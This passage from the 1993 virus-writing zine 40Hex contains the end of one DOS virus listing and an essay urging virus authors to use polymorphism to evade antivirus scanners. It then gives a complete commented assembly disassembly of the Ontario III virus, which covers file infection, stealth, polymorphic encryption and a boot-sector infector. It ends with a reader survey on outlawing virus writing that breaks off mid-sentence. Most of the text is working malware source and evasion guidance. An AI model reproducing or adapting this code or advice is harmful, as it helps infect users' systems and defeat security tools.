ax,es:[di+0Dh] ; get file time mov cs:filetime,ax ; save it mov ax,es:[di+0Fh] ; get file date mov cs:filedate,ax ; save it push cs pop ds mov dx,4E9h mov cx,3E8h mov ah,3Fh ; Read from file pushf call dword ptr cs:oldint21 jnc read_ok jmp errorinfect read_ok: mov bp,ax mov si,dx mov ax,'MZ' ; check if EXE cmp ax,[si] jne not_MZ jmp errorinfect not_MZ: xchg ah,al cmp ax,[si] ; check if EXE jne not_ZM jmp errorinfect not_ZM: push es push di push cs pop es mov si,100h ; check if already mov di,dx ; infected mov cx,offset endstart - offset start - 1 repe cmpsb pop di pop es jnz not_already_infected jmp errorinfect not_already_infected: mov word ptr es:[di+15h],0 push es push di mov si,cs:infectpointer add si,offset write_virus - offset infect xor di,di push cs pop es mov cx,offset end_write_virus-offset write_virus cld rep movsb pop di pop es mov si,cs:infectpointer add si,offset finish_infect - offset infect push si xor si,si push si push ds cli ; subvert nasty xor ax,ax ; antivirus programs mov ds,ax mov ax,cs:DOSdiskOFF xchg ax,ds:13h*4 mov cs:DOSdiskOFF,ax mov ax,cs:DOSdiskSEG xchg ax,ds:13h*4+2 mov cs:DOSdiskSEG,ax sti pop ds retn write_virus: push bx call cs:encryptpointer ; encrypt virus pop bx mov dx,100h mov ah,40h ; write virus mov cx,offset endvirus - offset start pushf call dword ptr cs:origint21 pushf push bx call cs:encryptpointer ; decrypt virus pop bx popf jnc write_OK pop ax mov ax,cs:infectpointer add ax,offset infectOK - offset infect push ax retn write_OK: mov ax,es:[di+11h] ; move file pointer mov es:[di+15h],ax ; to end of file mov dx,offset endvirus mov cx,bp mov ah,40h ; concatenate carrier pushf ; file's first few bytes call dword ptr cs:origint21 retn end_write_virus: finish_infect: mov ax,5701h ; restore file time/date mov cx,cs:filetime mov dx,cs:filedate pushf call dword ptr cs:oldint21 inc cs:infcounter cmp cs:infcounter,10d ; after 10 infections, jne infectOK call cs:restoreint21pointer ; turn off virus jmp short infectOK errorinfect: stc ; set error flag jmp short exitinfect infectOK: clc ; clear error flag exitinfect: pop bp pop di pop es pop ds pop dx pop cx retn endinfect: db 0 endvirus: int 20h carrierencrypt: mov word ptr cs:encryptpointer,offset encrypt retn end start ------------------------------------------------------------------------------- DA 40Hex Issue 10 Volume 3 Number 1 File 007 A Case Against Simple Encryption And For Polymorphism ~ ~~~~ ~~~~~~~ ~~~~~~ ~~~~~~~~~~ ~~~ ~~~ ~~~~~~~~~~~~ In a well-crafted virus, every line of code should serve a definite purpose. No byte should be wasted. Is encryption, long used by virus programmers, still a viable method of eluding scanners and, if not, is encryption any longer a necessary part of a virus? The type of encryption found in the typical virus is a simple XOR loop or another similar type of operation, i.e. rotate, add, etc. The idea behind encryption was to change the virus during each iteration so that scanners would not be able to detect it. However, such simple encryption hardly serves this job, as most scanners simply scan for a pattern found in the encryption. Only a handful delve deeper than the decryption routine. So the sole purpose of simple encryption such as that seen in most viruses nowadays seems to be to hide text strings from archaic text searching programs (remember those virus books that touted CHK4BOMB as the best thing since rotten Jello?). But is it worth including encryption solely for this purpose? I think not. Few people search files for unusual text strings and the extra code needed to encrypt a file for this purpose may hardly be justified to overcome this obstacle. As mentioned previously, waste should be frowned upon in viruses. Unquestionably, the ultimate goal of a virus is to avoid detection while spreading to the greatest number of hosts. It has been established that simple decryption patterns do not aid a virus in avoiding detection from scanners. And encryption is certainly not a vital part of the replication process. Thus simple attempts at encryption do not add anything of value to the virus. Yet these weak encryption routines _are occasionally_ necessary, but only as stepping stones for fledgling virus programmers entering the realm of polymorphism. Without a few simple encryption routines and knowledge of their use under his belt, a virus programmer would be hard-pressed to create a truly polymorphic virus. Therefore, it should be noted that simple encryption should be used only as part of the learning process. However, remember also that such encryption pales in the face of modern virus scanners and polymorphism is a far better alternative. Polymorphism is perhaps the best technique modern viruses use to avoid scanners. The other alternative, stealth techniques, is limited in utility and is rendered helpless in the face of simple memory scans. A combination of the two is desirable, yet it is not always possible to implement both in a virus of limited size. So let us examine polymorphism. Polymorphism, in its simplest form, merely consists of a fixed-length decryptor with a few bytes which may be altered during each infection. This is merely a small step up from the simple encryption routine. A few extra XOR statements in the code are all that is necessary for implementing such a routine. However, this is, once again, only a small step up; most such fixed- length decryptors may be detected by a couple scan strings with wildcards. More powerful polymorphism is necessary for evasion of scanners. The MtE and the recently introduced TPE are both powerful products which allow every virus to include polymorphism. However, it is important to note that viruses utilising such products may be detected by existing scanners. Therefore, it is desirable to write a new polymorphic routine from scratch. This will allow for longer survival of the virus. The chief problem with good polymorphism is that the virus should be able to detect existing infections of itself in files. Otherwise, the virus could grow beyond limit and much disk space would be taken up in redundant infections. Two methods are commonly used; the infection marker byte and the time stamp. However, such a check is inherently limiting as the virus scanner is then able to use said check to its advantage; it need not check files, for example, save those which have the seconds field set to eight. Then again, a scanner which functions in this manner would be helpless in detecting another virus utilising the identical polymorphic routine but with a different infection stamp. The second major difficulty with good polymorphic routines is simply the size. MtE, for example, adds over 2,000 bytes of code. A working, albeit limited, polymorphic routine is possible in half this size, yet it would still be 1,000 bytes, a size larger than most viruses. Increased size, of course, increases the disk access time. While generally irrelevant in a harddisk-based environment, this increased infection time becomes crucial when infecting files on floppy diskettes. There are precious few ways of alleviating this problem; the only real solution is to decrease the functionality of the polymorphic routine and thereby compromise its worth. Taken as a whole, the advantages in utilising polymorphic routines should outweigh the disadvantages. The increased difficulty of scanning may allow the virus to slip through the cracks even after a virus scanner claims to detect it reliably. Take, for example, MtE. To this day, many virus scanners fail to accurately report MtE infections; some still trigger false positives. To reiterate a previous point - simple decryption routines are worthless, as they fail to serve their main purpose of aiding in the evasion of scanners. Even simple polymorphic routines are easily defeated by scanners; true polymorphism or no encryption at all are only alternatives. Dark Angel Phalcon/Skism 1993 40Hex Issue 10 Volume 3 Number 1 File 008 The Ontario III virus was written by one of our YAM friends up in Canada, Death Angel. The virus infects COM/EXE files. Additionally, it attaches to SYS files yet does not truly infect them. When the virus is executed from a SYS file, it goes resident yet it never alters the interrupt vectors. Therefore, it is merely taking up space in memory. The virus automatically attacks COMSPEC upon receiving control, whether it is in a COM, EXE, or SYS host file. However, I suspect that the virus will have trouble dealing with command interpreters apart from COMMAND.COM, as it makes certain assumptions, i.e. the end of the file is filled with null characters. The virus utilises a simple polymorphic routine, although the decryptor is of a fixed length. The polymorphism is therefore of questionable utility. Additionally, the boot sector is pointless as it is never accessed. There are a few additional bugs in the virus which detract from its overall quality. ------------------------------------------------------------------------------- .model tiny .code ; Ontario III ; Disassembly by Dark Angel of Phalcon/Skism ; Assemble with TASM /m ONTARIO3.ASM ; Virus written by Death Angel of YAM org 0 decrypt: patch1: mov di,offset endvirus ; usually: offset enddecrypt patch2 = $ - 2 patch3 = $ mov cx,37E5h patch4 = $ - 2 patch5: db 82h, 0C5h, 0D0h ; add ch,0D0h patch6 = $ - 1 patch7: mov al,0Ah patch8 = $ - 1 decrypt_loop: add cs:[di],al patch9 = $ - 1 patch10: ror al,cl patch11 = $ - 1 patch12: inc di patch13: loop decrypt_loop enddecrypt: patch14: db 89h, 0FBh ; mov bx,di patch15 = $ - 1 sub bx,offset save4 xchg ax,cx dec ax cld call saveorigvectors db 0e9h ; jmp SYSpatch dw 0 ; currently jmp to next line int 21h ; installation check or al,ah jz restorefile push ds mov cx,bx mov di,ds ; save current ds mov ah,13h ; get BIOS int 13h handler int 2Fh ; to ds:dx and es:bx mov si,ds ; does function function? cmp si,di je skipit push ds push dx mov ah,13h ; restore handler int 2Fh mov bx,cx ; but save its address too pop word ptr cs:[bx+storeint13_1] pop word ptr cs:[bx+storeint13_2] skipit: xor di,di mov cx,es dec cx mov ds,cx ; get MCB of current program sub word ptr [di+3],140h ; decrease size by 5K mov ax,[di+12h] ; get high memory from PSP sub ax,140h ; decrease size by 5K mov [di+12h],ax ; replace it mov es,ax ; es->high memory segment sub ax,1000h mov word ptr cs:[bx+patchsegment],ax push cs pop ds mov si,bx mov cx,offset save4 rep movsb mov ds,cx cli mov word ptr ds:21h*4,offset int21 ; set int 21h handler mov ds:21h*4+2,es ; to virus's sti mov ax,4BFFh ; infect COMSPEC push bx int 21h pop bx pop ds push ds pop es restorefile: lea si,[bx+offset save4] mov di,100h cmp bx,di jb restoreEXE push di movsw movsw retn restoreEXE: mov ax,es ; get start segment add ax,10h ; adjust for PSP add cs:[si+2],ax ; relocate CS add cs:[si+4],ax ; relocate SS cli mov sp,cs:[si+6] ; restore stack mov ss,cs:[si+4] sti jmp dword ptr cs:[si] int21instcheck: inc ax iret int21: cmp ax,0FFFFh ; installation check? je int21instcheck cmp ah,4Bh ; execute? je execute cmp ah,11h ; FCB find first? je findfirstnext cmp ah,12h ; FCB find next? je findfirstnext cmp ax,3D00h ; open file read only? jne int21exit call handleopen int21exit: db 0EAh ; jmp far ptr oldint21 dd 0 findfirstnext: ; standard stealth routine push bp mov bp,sp cmp word ptr [bp+4],1234h patchsegment = $ - 2 pop bp jb int21exit call callint21 ; do findfirst/next call pushall mov ah,2Fh ; Get DTA call callint21 cmp byte ptr es:[bx],0FFh ; extended FCB? je findfirstnextnotextendedFCB sub bx,7 ; convert to standard findfirstnextnotextendedFCB: mov al,es:[bx+1Eh] ; get seconds counter and al,1Fh ; check if 62 seconds cmp al,1Fh ; (infection marker) jne findfirstnextexit ; exit if not mov dx,es:[bx+26h] ; get file size mov ax,es:[bx+24h] sub ax,viruslength ; decrease by virus sbb dx,0 ; size or dx,dx jc findfirstnextexit mov es:[bx+26h],dx ; replace file size mov es:[bx+24h],ax ; with "stealthed" one findfirstnextexit: call popall iret execute: mov byte ptr cs:infectSYS,0 cmp al,1 ; load/don't execute je load_noexecute cmp al,0FFh ; called by virus je infectCOMSPEC call infectDSDX jmp short int21exit infectCOMMANDCOM: mov byte ptr cs:infectSYS,0 push dx push ds mov dx,offset command_com push cs pop ds mov byte ptr ds:infCOMMAND,0FFh ; infecting COMMAND.COM call infectDSDX pop ds pop dx iret infectCOMSPEC: mov ah,51h ; Get current PSP call callint21 mov es,bx mov ds,es:[2Ch] ; environment block xor si,si push cs pop es infectCOMSPECfindcomspec: mov di,offset comspec ; is 'COMSPEC=' the first mov cx,4 ; entry in environment? repe cmpsw ; (should be) jcxz infectCOMSPECnoenvironment ; otherwise, quit infectCOMSPECfindend: lodsb ; search for end of string or al,al jnz infectCOMSPECfindend cmp byte ptr [si],0 ; found it? jne infectCOMSPECfindcomspec; nope, try again jmp short infectCOMMANDCOM ; otherwise, infect infectCOMSPECnoenvironment: mov dx,si mov byte ptr cs:infCOMMAND,0FFh ; infecting COMMAND.COM call infectDSDX ; but are we really? Maybe iret ; it's 4DOS. This is a bug. load_noexecute: push es ; save parameter block push bx call callint21 ; prechain pop bx pop es call pushall jnc load_noexecute_ok ; continue if no error jmp load_noexecute_exit load_noexecute_ok: xor cx,cx lds si,dword ptr es:[bx+12h]; get entry point on return push ds push si mov di,100h cmp si,di jl loading_EXE ja load_noexecute_quit ; debugger active lodsb cmp al,0E9h ; check if infected jne load_noexecute_quit lodsw push ax ; save jmp location lodsb cmp al,'O' ; check for infection marker pop si ; get jmp location jnz load_noexecute_quit add si,103h ; convert to file offset inc cx inc cx pop ax push si push ds pop es jmp short check_infection loading_EXE: lea di,[bx+0Eh] ; check SS:SP on return cmp word ptr es:[di],9FFh ; infected? jne load_noexecute_quit check_infection: lodsb cmp al,0BBh ; possibility 1 je infected_checked1 cmp al,0BEh ; possibility 2 je infected_checked1 cmp al,0BFh ; possibility 3 jne load_noexecute_quit infected_checked1: lodsw ; get starting offset push ax ; to decrypt lodsb ; get next byte cmp al,0B9h ; check for infection lodsw pop si ; offset to decrypt jnz load_noexecute_quit cmp ah,7 ; check if infected je infected_checked2 cmp al,0E5h ; ditto jne load_noexecute_quit infected_checked2: add si,save4 - enddecrypt jcxz disinfectEXE rep movsw jmp short finish_disinfection disinfectEXE: mov ah,51h ; Get current PSP call callint21 add bx,10h ; go to file starting CS mov ax,[si+6] dec ax dec ax stosw mov ax,[si+4] add ax,bx stosw movsw lodsw add ax,bx stosw finish_disinfection: pop di pop es xchg ax,cx mov cx,viruslength rep stosb jmp short load_noexecute_exit load_noexecute_quit: pop ax pop ax load_noexecute_exit: call popall retf 2 handleopen: call pushall mov si,dx ; find extension of handleopenscanloop: ; ASCIIZ string lodsb or al,al ; found end of screen? jz handleopenexit ; yup, no extension -- exit cmp al,'.' ; extension found? jne handleopenscanloop mov di,offset validextensions - 3 push cs pop es mov cx,4 nop scanvalidextension: push cx push si mov cl,3 add di,cx push di check_extension: lodsb and al,5Fh ; Capitalise cmp al,es:[di] ; do they compare ok? jne extension_no_match ; nope, try next one inc di loop check_extension cmp al,'S' ; SYS file? jne opennotSYS mov byte ptr cs:infectSYS,0FFh ; infecting SYS file opennotSYS: call infectDSDX add sp,6 jmp short handleopenexit extension_no_match: pop di pop si pop cx loop scanvalidextension handleopenexit: call popall retn infectDSDX: call pushall call replaceint13and24 push dx push ds mov ax,4300h ; get attributes call callint21 push cx pushf jc go_restoreattribs push cx and cl,1 ; check if read only cmp cl,1 jne infectDSDXnoclearattributes xor cx,cx ; clear if so mov ax,4301h call callint21 infectDSDXnoclearattributes: pop cx and cl,4 cmp cl,4 je go_restoreattribs mov ax,3D02h ; open file read/write call callint21 jnc infectDSDXopenOK ; continue if no error go_restoreattribs: jmp infectDSDXrestoreattributes infectDSDXopenOK: xchg ax,bx ; handle to bx push cs push cs pop ds pop es mov word ptr ds:SYSpatch,0 mov ax,5700h ; save file time/date call callint21 push dx push cx and cl,1Fh ; check if infected cmp cl,1Fh ; (seconds == 62) je infectDSDXerror mov dx,offset readbuffer ; read header from mov cx,1Ch ; potential carrier mov ah,3Fh ; file to the call callint21 ; buffer jnc infectDSDXreadOK ; continue if no error infectDSDXerror: stc ; mark error jmp infectDSDXclose ; and exit infectDSDXreadOK: cmp ax,cx ; read 1ch bytes? jne infectDSDXerror ; exit if not xor dx,dx mov cx,dx mov ax,4202h ; go to end of file call callint21 or dx,dx jnz infectDSDXfilelargeenough cmp ax,0A01h ; check if too small jb infectDSDXerror infectDSDXfilelargeenough: cmp dl,5 ja infectDSDXerror cmp word ptr ds:readbuffer,'ZM' ; EXE? je infectDSDXskipcheck cmp word ptr ds:readbuffer,'MZ' ; EXE? infectDSDXskipcheck: je infectDSDXcheckEXE cmp byte ptr ds:infectSYS,0FFh ; infecting SYS file? jne infectDSDXcheckCOM cmp word ptr ds:readbuffer,0FFFFh ; check if SYS jne infectDSDXerror ; file cmp word ptr ds:readbuffer+2,0FFFFh isanoverlay: jne infectDSDXerror or dx,dx jnz infectDSDXerror push ax ; save file size mov di,offset save4 mov ax,5657h ; push di, push si stosw mov ax,0E953h ; push bx, jmp decrypt stosw mov ax,offset decrypt - (offset save4 + 6) stosw mov ax,word ptr ds:readbuffer+6 ; get strategy start point stosw pop ax ; get file size push ax add ax,offset save4 mov word ptr ds:readbuffer+6,ax mov word ptr ds:SYSpatch,offset strategy-(offset SYSpatch + 2) mov byte ptr ds:decrypt_loop,36h ; replace with SS: pop ax add ax,offset enddecrypt jmp short go_infectDSDXcontinue infectDSDXcheckCOM: cmp byte ptr ds:readbuffer+3,'O'; check if already infected jmp_infectDSDXerror: je infectDSDXerror cmp byte ptr ds:infCOMMAND,0; infecting COMMAND.COM? je dontdoslackspace sub ax,viruslength ; infect slack space of xchg ax,dx ; command.com xor cx,cx mov ax,4200h call callint21 dontdoslackspace: mov si,offset readbuffer mov di,offset save4 movsw movsw sub ax,3 ; convert size->jmp dest mov byte ptr ds:readbuffer,0E9h ; encode JMP mov word ptr ds:readbuffer+1,ax ; and destination mov byte ptr ds:readbuffer+3,'O' ; mark infected add ax,116h go_infectDSDXcontinue: jmp short infectDSDXcontinue infectDSDXcheckEXE: cmp word ptr ds:readbuffer+10h,0A01h ; already infected? je jmp_infectDSDXerror cmp word ptr ds:readbuffer+1Ah,0 jne isanoverlay ; exit if it's an overlay push dx push ax mov cl,4 ror dx,cl shr ax,cl add ax,dx ; ax:dx = file size sub ax,word ptr ds:readbuffer+8 ; subtract header size mov si,offset readbuffer+14h mov di,offset origCSIP movsw ; save initial CS:IP movsw mov si,offset readbuffer+0Eh movsw ; save initial SS:SP movsw mov word ptr ds:readbuffer+16h,ax ; set initial CS mov word ptr ds:readbuffer+0Eh,ax ; set initial SS mov word ptr ds:readbuffer+10h,0A01h ; set initial SP pop ax pop dx push ax add ax,0A01h ; adc dx,0 works just as well jnc infectEXEnocarry inc dx infectEXEnocarry: mov cx,200h ; take image size div cx ; The next line is not entirely corrrect. The image size ; div 512 is rounded up. Therefore, DOS will find this number ; to be off by 512d bytes mov word ptr ds:readbuffer+4,ax ; image size div 512 mov word ptr ds:readbuffer+2,dx ; image size mod 512 pop ax and ax,0Fh mov word ptr ds:readbuffer+14h,ax ; set initial IP add ax,offset enddecrypt infectDSDXcontinue: mov word ptr ds:patch2,ax ; patch start area push bx ; save file handle xor byte ptr ds:decrypt_loop,18h ; swap SS: & CS: call encrypt ; encrypt virus to buffer pop bx ; restore file handle mov ah,40h ; Concatenate encrypted call callint21 ; virus jc infectDSDXclose ; exit on error xor dx,dx mov cx,dx mov ax,4200h ; go to start of file call callint21 jc infectDSDXclose mov dx,offset readbuffer mov cx,1Ch mov ah,40h ; Write new header call callint21 infectDSDXclose: pop cx pop dx jc infectDSDXnoaltertime cmp byte ptr ds:infCOMMAND,0FFh ; infecting COMMAND.COM? je infectDSDXnoaltertime or cl,1Fh ; set time to 62 seconds infectDSDXnoaltertime: mov ax,5701h ; restore file time/date call callint21 mov ah,3Eh ; Close file call callint21 infectDSDXrestoreattributes: mov byte ptr cs:infCOMMAND,0 mov byte ptr cs:infectSYS,0 popf pop cx pop ds pop dx jc infectDSDXexit mov ax,4301h ; restore file attributes call callint21 infectDSDXexit: call restoreint13and24 call popall retn pushall: push bp mov bp,sp push bx push cx push dx push si push di push ds push es pushf xchg ax,[bp+2] push ax mov ax,[bp+2] retn popall: pop ax xchg ax,[bp+2] popf pop es pop ds pop di pop si pop dx pop cx pop bx pop bp retn replaceint13and24: push ds xor ax,ax mov ds,ax mov si,13h*4 lodsw mov word ptr cs:origint13_1,ax lodsw mov word ptr cs:origint13_2,ax mov si,24h*4 lodsw mov word ptr cs:origint24_1,ax lodsw mov word ptr cs:origint24_2,ax mov word ptr ds:13h*4,1234h storeint13_1 = $ - 2 mov word ptr ds:13h*4+2,1234h storeint13_2 = $ - 2 mov word ptr ds:24h*4,offset int24 ; replace int 24 handler mov ds:24h*4+2,cs pop ds retn restoreint13and24: xor ax,ax mov ds,ax mov word ptr ds:13h*4,1234h origint13_1 = $ - 2 mov word ptr ds:13h*4+2,1234h origint13_2 = $ - 2 mov word ptr ds:24h*4,1234h origint24_1 = $ - 2 mov word ptr ds:24h*4+2,1234h origint24_2 = $ - 2 retn int24: xor al,al iret encrypt: mov di,offset patch4 mov si,di mov word ptr [si],offset save4 - offset enddecrypt xor bx,bx call random jz encrypt1 add bl,4 inc di encrypt1: call random in al,40h ; get random # mov bh,al jz encrypt2 add [di],al ; alter amount to encrypt add bl,28h jmp short encrypt3 encrypt2: sub [di],al ; alter amount to encrypt encrypt3: add bl,0C1h mov [si+3],bx call random jz encrypt4 xor byte ptr [si+2],2 ; flip betwen add/sub encrypt4: in ax,40h ; get random number != 0 or ax,ax jz encrypt4 mov bx,3 ; first choose one of xor dx,dx ; three possible registers div bx xchg ax,bx inc ax ; ax = 4 mul dx ; convert to offset in xchg ax,bx ; table lea si,[bx+offset table1] lodsb mov byte ptr ds:patch1,al lodsb mov byte ptr ds:patch9,al lodsb mov byte ptr ds:patch12,al lodsb mov byte ptr ds:patch15,al call random jz encrypt5 xor byte ptr ds:patch13,2 ; loop/loopnz encrypt5: in ax,40h ; get random number mov byte ptr ds:patch8,ah and ax,0Fh xchg ax,bx shl bx,1 mov ax,[bx+offset table2] mov word ptr ds:patch10,ax xor si,si mov di,offset encryptbuffer ; copy virus to mov cx,endvirus - decrypt ; temporary buffer push cx ; for encryption cld rep movsb mov bx,offset enddecrypt push word ptr [bx] ; save it mov byte ptr [bx],0C3h ; put retn in its place push bx xor byte ptr [bx-7],28h ; sub/add push word ptr ds:decrypt_loop mov byte ptr [bx-8],2Eh ; CS: mov dx,offset encryptbuffer add bx,dx mov word ptr ds:patch2,bx call decrypt pop word ptr ds:decrypt_loop pop bx pop word ptr [bx] pop cx retn random: ; 1/2 chance of zero flag set in al,40h and al,1 cmp al,1 retn saveorigvectors: push ds push ax xor ax,ax mov ds,ax mov ax,ds:13h*4 mov word ptr cs:[bx+storeint13_1],ax mov ax,ds:13h*4+2 mov word ptr cs:[bx+storeint13_2],ax mov ax,ds:21h*4 mov word ptr cs:[bx+offset oldint21],ax mov ax,ds:21h*4+2 mov word ptr cs:[bx+offset oldint21+2],ax pop ax pop ds retn strategy: mov word ptr cs:[bx+doffset],bx ; save delta offset pop bx pop di pop si call pushall push cs pop ds mov bx,1234h ; restore delta offset doffset = $ - 2 db 8bh, 87h ; mov ax,ds:[save4+6] dw offset save4 + 6 ; get old strategy entry point mov word ptr ds:[6],ax ; and restore to file header int 12h ; Get memory size in K sub ax,5 ; decrease by 5 K mov cl,6 ; convert to paragraphs shl ax,cl mov es,ax mov word ptr ds:[bx+himemsegment],ax cmp byte ptr es:[3],0B9h ; check if already installed je strategyexit mov si,bx ; copy to high memory xor di,di mov cx,viruslength rep movsb pushf db 09Ah ; call far ptr dw infectCOMMANDCOM himemsegment dw 0 strategyexit: call popall jmp word ptr cs:[6] ; go to original strategy table1 db 0BEh, 04h, 46h,0F3h ; si db 0BFh, 05h, 47h,0FBh ; di db 0BBh, 07h, 43h,0DBh ; bx table2: inc al dec al inc ax inc ax dec ax dec ax add al,cl sub al,cl xor al,cl xor al,ch not al neg al ror al,1 rol al,1 ror al,cl rol al,cl nop nop add al,ch comspec db 'COMSPEC=' command_com db '\COMMAND.COM',0 validextensions db 'COMEXEOVLSYS' bootsector: ; offset 600h in the virus jmp short bootsectorentry nop bootparms db 3Bh dup (0) bootsectorentry: xor ax,ax mov ds,ax cli mov ss,ax mov sp,7C00h sti mov ax,ds:13h*4 ; get int 13h handler mov word ptr ds:[7C00h+oldint13-bootsector],ax mov ax,ds:13h*4+2 ; and save it mov word ptr ds:[7C00h+oldint13+2-bootsector],ax mov ax,ds:[413h] ; get total memory sub ax,2 ; reduce by 2K mov ds:[413h],ax ; replace memory size mov cl,6 shl ax,cl ; convert to paragraphs sub ax,60h ; go to boot block start mov es,ax mov si,sp mov di,offset bootsector mov cx,100h rep movsw mov dx,offset highentry push es push dx retf highentry: xor ax,ax ; reset disk and dl,al int 13h push ds push es pop ds pop es mov bx,sp ; read to 0:7C00h mov dx,drivehead ; find where original boot mov cx,sectortrack ; block stored and then mov ax,201h ; read original boot int 13h ; sector jc $ ; halt on error xor ax,ax ; else chain to original mov ds,ax ; boot sector mov word ptr ds:13h*4,offset int13 mov ds:13h*4+2,cs ; replace int 13h handler push es push bx retf int13: push bp mov bp,sp push ds push es push si push di push dx push cx push bx push ax pushf xor bx,bx mov ds,bx test byte ptr ds:[43Fh],1 ; A: spinning? jnz exitint13 ; exit if so or dl,dl ; default drive? jnz exitint13 ; exit if not cmp ah,2 ; read/write/verify? jb exitint13 cmp ah,4 jbe trapint13 exitint13: popf pop ax pop bx pop cx pop dx pop di pop si pop es pop ds pop bp jmp dword ptr cs:oldint13 ; chain to original handler trapint13: cld push cs push cs pop es pop ds xor cx,cx mov dx,cx inc cx mov bx,offset endvirus ; read boot block to mov ax,201h ; buffer at endvirus call callint13 jnc int13readOK int13exit: jmp short exitint13 int13readOK: cmp word ptr [bx+15h],501Eh ; push ds, push ax? jne int13skip cmp word ptr [bx+35h],0FF2Eh; jmp cs: ? jne int13skip cmp word ptr [bx+70h],7505h ; add ax,XX75 ? jne int13skip mov dh,1 mov cl,3 mov ax,201h call callint13 xor dh,dh mov cl,1 mov ax,301h call callint13 int13skip: cmp word ptr ds:[offset endvirus-bootsector+YAM],'Y*' je int13exit ; don't infect self cmp word ptr ds:[offset endvirus+0Bh],200h jne int13exit ; infect only 512 bytes per sector cmp byte ptr ds:[offset endvirus+0Dh],2 jne int13exit ; only 2 reserved sectors cmp word ptr ds:[offset endvirus+1Ah],2 ja int13exit ; only 2 sec/track xor dx,dx ; calculate new location of boot block mov ax,word ptr ds:[offset endvirus+13h] ; total sec mov bx,word ptr ds:[offset endvirus+1Ah] ; sec/track mov cx,bx div bx ; # track xor dx,dx mov bx,word ptr ds:[offset endvirus+18h] ; sec/FAT div bx sub word ptr ds:[offset endvirus+13h],cx ; total sec dec ax mov byte ptr sectortrack+1,al mov ax,word ptr ds:[offset endvirus+18h] ; sec/FAT mov byte ptr sectortrack,al mov ax,word ptr ds:[offset endvirus+1Ah] ; sec/track dec ax mov byte ptr drivehead+1,al mov byte ptr drivehead,0 mov dx,drivehead ; move original boot block mov cx,sectortrack ; to end of disk mov bx,offset endvirus mov ax,301h call callint13 jc go_exitint13 mov si,offset endvirus+3 ; copy parameters so mov di,offset bootparms ; no one notices boot mov cx,bootsectorentry - bootparms ; block is changed rep movsb xor cx,cx mov dx,cx inc cx mov bx,offset bootsector ; copy virus boot block mov ax,301h call callint13 go_exitint13: jmp exitint13 callint21: pushf call dword ptr cs:oldint21 retn callint13: pushf call dword ptr cs:oldint13 retn oldint13 dd 0 drivehead dw 100h sectortrack dw 2709h YAM db '*YAM*',1Ah db 'Your PC has a bootache! - Get some medicine!',1Ah db 'Ontario-3 by Death Angel',1Ah,1Ah,1Ah,1Ah save4: origCSIP db 0CDh, 020h, 0, 0 origSSSP dd 0 endvirus: viruslength = $ - decrypt infCOMMAND db ? infectSYS db ? readbuffer db 01Ch dup (?) encryptbuffer db viruslength dup (?) end decrypt ------------------------------------------------------------------------------- DA 40Hex Issue 10 Volume 3 Number 1 File 009 40-hex Survey: Should Writing a Virus Be Outlawed? by DecimatoR Recently, while conversing with Garbageheap, I was inspired with the idea for this article. So, with the help of a lot of people in the UseNet alt.security and comp.virus newsgroups, I have determined what seems to be the answer to my question. My thanks to all who responded - couldn't have done it without ya! I posted this message in alt.security and comp.virus: "Greetings.... Some of you may read the infamous 40-Hex Virus magazine, published by us. If so, we'd like your opinions for a survery we're doing. The results of this survey will be published in 40-hex #10. Here are the survey questions. Please answer them, and respond via email to me. You may respond with simple Yes or No answers, or you may be as wordy as you want. Please note - ANY response given might be published in 40-hex magazine. Now, the questions: 1) Should it be Federally illegal to write a computer virus? 2) Should it be Federally illegal to distribute computer viruses, to KNOWING individuals (ie on "virus" boards)? (This does NOT mean infecting another person with a virus - it means giving them a copy of a virus, and making sure they KNOW it is a virus) 3) If executable virus code is illegal, then should the SOURCE code to the viruses be illegal to copy, sell, or other wise distribute? Please mail me with YOUR opinions to the above, and feel free to explain your views, or present other opinions you may have. We are attempting to get a general idea as to the thoughts of people, therefore we are posting this to COMP.VIRUS, and ALT.SECURITY, and any other appropriate newsgroups. Please note - we are NOT interested in the legallity of SPREADING virus code by infection - that IS already illegal. We are also not interested in the ethic issues of viruses. We want your opinions as to what should be OUTLAWED, and what should be LEGAL. Of course, any other opinions you may wish to add are welcome. Thanks for your time and consideration.. --DecimatoR Phalcon/Skism 40-Hex Magazine Columnist" Amazingly, almost all of the responses stated that NO, it _SHOULD_NOT_ be illegal to write, or distribute (to knowing persons) a computer virus. Many respondees regarded that as censorship, and wanted nothing of the sort. However, there were a few replies which, while not condoning the outlawing of virus creation, also certainly did not condone the authoring or distributing of viruses. There was one man, from England, though, who firmly stated that there should be international laws banning the creation of, distribution of, and sharing of virus source code. The fact that only one person responded in this manner surprised me. I expected more. Here are a few quotes from the responses I got. There are no names or addresses attatched in most cases. I posted my original survey question through an anonymous mailer, since I wasn't too sure of the response I'd get, and in turn, the responses were also anonymous. ******************************************************************************* 1) Should it be Federally illegal to write a computer virus? ******************************************************************************* From David: "Not at all. The government is already quite behind the times when it comes to legislating technical issues. I don't believe they are qualified to enact competent legislation. We're talking about a government who thought Steve Jackson Games should be raided for compiling a cyberpunk roleplaying supplement... Leaving aside the question of their technical knowledge, it smacks of censorship. The inception of a computer program is roughly analogous to the writing of a book. Put this way, your question could be phrased like: "Should it be Federally illegal to write a [pornographic, anarchistic, insert-favorite-word-here] book?" We know that the writing of a book is protected by the US constitution as a form of expression. The writing of a computer program is a similar form of expression, and should thus be inviolate..." -------------------------- From: an11445@anon.penet.fi: NO! however, if people do not exhibit ethical behaviour regarding viruses, they are forcing such a law to be made. if someone wants the right to write what they want on their own computer, they would be well advised to not release to any other person this program unless they are -absolutely certain- that person will : a. not use the program for any damaging purpose b. not use the program to play tricks on people c. not allow the program to leave his/her hands without ensuring the above conditions are met. -------------------------- From: an10445@anon.penet.fi (Cutthroat): No. A virus is simply a section of code that travels with another section of code. Viruses are not inherently malicious. -------------------------- From: an2284@anon.penet.fi > 1) Should it be Federally illegal to write a computer virus? No. It's just code. The minute you start outlawing one kind of program, you've introduced censorship. -------------------------- From: an11290@anon.penet.fi: (Roger) > 1) Should it be Federally illegal to write a computer virus? Hard one. The problem is that I'd like it to be legal: people should be free to experiment with this kind of stuff providing they keep it safe in their own environment. However when parallels are sought with current law, we are forced to another conclusion: selling a gun is potentially harmless untill the gun is used. It's partly the responsibility of the SELLER to keep guns from spreading to unqualified people. Now the question rises: can a computer Virus be compared to a GUN. I think it can: both are harmless until employed in a dangerous fashion. In short computer viruses provide a threat to our society. Current law prohibits possession of objects that pose a threat to society. (Partly because this makes it easier to prosecute people that most likely want to employ these objects in a bad way). -------------------------- From: Josh@lehigh Absolutely not. It's a crummy, unethical, lousy, rotten, thing to do, but making it illegal to write *any* type of a computer program is reminiscent of George Orwell's "1984" and Big Brother. There is also too much speculation as to what a 